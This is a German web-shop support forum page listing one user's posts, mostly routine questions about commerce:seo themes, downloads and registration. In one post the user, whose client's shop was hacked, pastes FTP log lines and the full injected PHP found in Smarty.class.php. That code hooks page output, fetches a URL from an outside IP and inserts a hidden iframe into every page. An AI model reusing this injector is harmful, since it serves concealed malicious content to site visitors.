Hey.
Das liegt alles bei Domainfactory, müsste nen normales Webpacket sein. Die updaten das wohl nicht regelmäßig?
Beiträge von Netzlichter
-
-
Ok Danke für deine Hilfe. Wir leiten alles dem Kunden weiter. Seiten sind erstmal Offline...
-
Also, der Kunde hatte uns kontaktiert. Wie gesagt ALLE Dateien auf dem Server sind kompromittiert. Ein Auszug aus dem Log-File:
[12.02.2013 20:49:34] 511a9cce.bc5 376445-ftp 62.113.204.118 D 6053 0 /kunden/376445_40229/statistik/*/index.html
[12.02.2013 20:49:34] 511a9cce.bc5 376445-ftp 62.113.204.118 U 6574 0 /kunden/376445_40229/statistik/*/index.html
[12.02.2013 20:49:35] 511a9cce.bc5 376445-ftp 62.113.204.118 D 60129 0 /kunden/376445_40229/statistik/*/usage_201210.html
[12.02.2013 20:49:35] 511a9cce.bc5 376445-ftp 62.113.204.118 U 60649 0 /kunden/376445_40229/statistik/*/usage_201210.html
[12.02.2013 20:49:35] 511a9cce.bc5 376445-ftp 62.113.204.118 D 84545 0 /kunden/376445_40229/statistik/*/usage_201211.html
[12.02.2013 20:49:35] 511a9cce.bc5 376445-ftp 62.113.204.118 U 85065 0 /kunden/376445_40229/statistik/*/usage_201211.html
[12.02.2013 20:49:35] 511a9cce.bc5 376445-ftp 62.113.204.118 D 85819 0 /kunden/376445_40229/statistik/*/usage_201212.html
[12.02.2013 20:49:35] 511a9cce.bc5 376445-ftp 62.113.204.118 U 86338 0 /kunden/376445_40229/statistik/*/usage_201212.html
[12.02.2013 20:49:35] 511a9cce.bc5 376445-ftp 62.113.204.118 D 86608 0 /kunden/376445_40229/statistik/*/usage_201301.html
[12.02.2013 20:49:35] 511a9cce.bc5 376445-ftp 62.113.204.118 U 87129 0 /kunden/376445_40229/statistik/*/usage_201301.html
[12.02.2013 20:49:35] 511a9cce.bc5 376445-ftp 62.113.204.118 D 67869 0 /kunden/376445_40229/statistik/*/usage_201302.html
[12.02.2013 20:49:36] 511a9cce.bc5 376445-ftp 62.113.204.118 U 68384 0 /kunden/376445_40229/statistik/*/usage_201302.html
usw..................................Hat mit dem Shop glaube reichlich wenig zu tun eghabt. Da hatte wer direkten FTP-Zugriff!
-
Alles klar, die gesamten PHP/HTML Dateien auf Domainfactory wurden geändert, nur das Wordpress wie immer funktioniert hat und nur der Shop nicht mehr funktionierte... Wird der Kunde wohl sein FTP-Passwort verloren haben...
-
Also auf meinem Rechenr nicht. Es war die letzte Version von SEO.Commerce installiert, mit allen Patches, Fixes etc..
Es muss doch irgendwas mit dem smarty-php zu tun haben? Vielleicht hat der Kunde einen Trojaner auf dem Rechner. Aber wieso würde man dann Code in die smarty Datei einschleusen...?
Dank dir schon mal :(... -
Ja wie kann das sein?
-
Hey.
Ich glaube ein Shop wurde gehackt.
Wenn ich auf den Shop gehe kommt nur:
"My ERROR [256] Smarty error: [in cseo-css-v2-m/boxes/box_best_sellers.html line 14]: syntax error: unrecognized tag 'var' (Smarty_Compiler.class.php, line 593)
Fatal error on line 1098 in file */includes/classes/Smarty_2.6.26/Smarty.class.php, PHP 5.2.17 (Linux)
Die Abfrage wurde abgebrochen, kontaktieren Sie den Administrator..."Also hab ich mal in die Smart.class.php reingeschaut, was mir schon komisch vorkam war, dass die dateien am 12.02.2013 geädnert wurden.
Ganz oben in der Datei seht das:
"<?php /*66da8e7241377a6189607cf072079147mftknyz2aatkim16*/if (!defined('HDDD467FFEY322')){function _shutdown_function($asd){$write =<<<AOLEW
<script type='text/javascript'>if (typeof KDDRTFGEG == 'undefined') {document.write("<iframe src='%kkk%' style='position:absolute;top:-1000px;left:-1000px;text-indent:-1000;width:1px;height:1px;'></iframe>");KDDRTFGEG=true;}</script>
AOLEW;
$asd = preg_replace('/<!--66da8e7241377a6189607cf072079147mftknyz2aatkim16-->(.*?)<!--66da8e7241377a6189607cf072079147mftknyz2aatkim16-->/i', '', $asd); $sdf = file_get_contents('http://66.85.144.233/url.php');return str_replace('</body>', str_replace('%kkk%', $sdf, $write) . '</body>', $asd);}if (function_exists('ob_start') && is_callable('ob_start')) $result = ob_start('_shutdown_function', 0, true);define('HDDD467FFEY322', 1);}/*66da8e7241377a6189607cf072079147mftknyz2aatkim16*/ ?><?php...."Könnt ihr mir helfen?
Beste Grüße! -
Hallo,
ihr habt wirklich kein Android Gerät? Das problem ist, es ist ein "Download-Shop für Android Apps" und irgendetwas scheint nicht zu funktionieren. Wie gesagt, die Downloads funtkionieren nur nicht unter Android... -
Hallo,
ich möchte Downloads über einen Shop verkaufen. Die Downloads können per iOS sowie mit dem PC runtergeladen werden. Jedoch kommt bei jeglichem Android Gerät: "Download fehlgeschlagen" - der Download startet erst gar nicht.Ich bin für jede Hilfe Dankbar.
Beste Grüße -
Hallo,
ist es möglich commerce:seo so einzustellen, dass nur der Name, die E-Mail und ein Passwort zur Registrierung benötigt werden. Mehr Daten brauche ich nicht, es soll ein Download-Shop werden.
beste Grüße! -
Hey.
Wie kann ich nur eine bestimmte E-Mail Adressendung bei der Anmeldung erlauben. So soll sich z.B. nur "@testmail.de" anmelden können.Beste Grüße!
-
Geht es auch "sauberer"? Naja schöner nicht unbedingt. Der grund ist, dass der shop in eine app eingebunden wird und somit nur vom handy aufgerufen wird.
Wie ist es möglich, dass man auf den shop nur zugriff hat wenn man von einem bestimmten referrer kommt?Habt ihr interesse an dem code für einen produkte-bilder-slider fürs mobile theme? Man kann die produktbilder dann per finger swipe wechseln.
-
Thx. Hab einfach False = True gesetzt und funktioniert. Auch anemelden, bestellen geht alles...
-
Ich möchte doch einfach nur das mobile template auf allen geraeten anzeigen lassen...
-
Da muss es doch eine ganz einfache Lösung für geben?
-
Ja die frage hat sich eh erledigt. Aber wie kann ich immer das mobile theme laden lassen? http://plussupport.commerce-seo.de/showthread.php?t=763 wenn ich im backend beides auf mobile theme stelle wird das theme nicht richtig geladen...
-
Hallo,
wenn ich für alle das Mobile Theme einstelle, wird die Seite nicht mehr korrekt geladen. Wie kann ich immer nur das mobile Theme anzeigen lassen?
Grüße! -
Hallo,
leider werden die Produktbilder auf der Produktdetailseite beim Mobilen Theme nicht angezeigt (nur das erste Produktbild). Am liebsten würde ich die Bilder so wie im Apple-AppStore ausgeben lassen, so dass man mit einem Fingerwisch die einzelnen Bilder wechseln kann.Danke für eure Mühe!
Viele Grüße
-
Kann ich das ins SQL-Tool kopieren?
-
Hallo,
ist es möglich die maximale Länge des Alternativtextes zu ändern?
Zur Zeit werden unter "Artikel"->"Bilder"->"Produktbilder"->"Alternativtext:" alles abgeschnitten was länger als 64 Zeichen ist. Ich möchte die BEgrenzung gerne aufheben.Beste Grüße!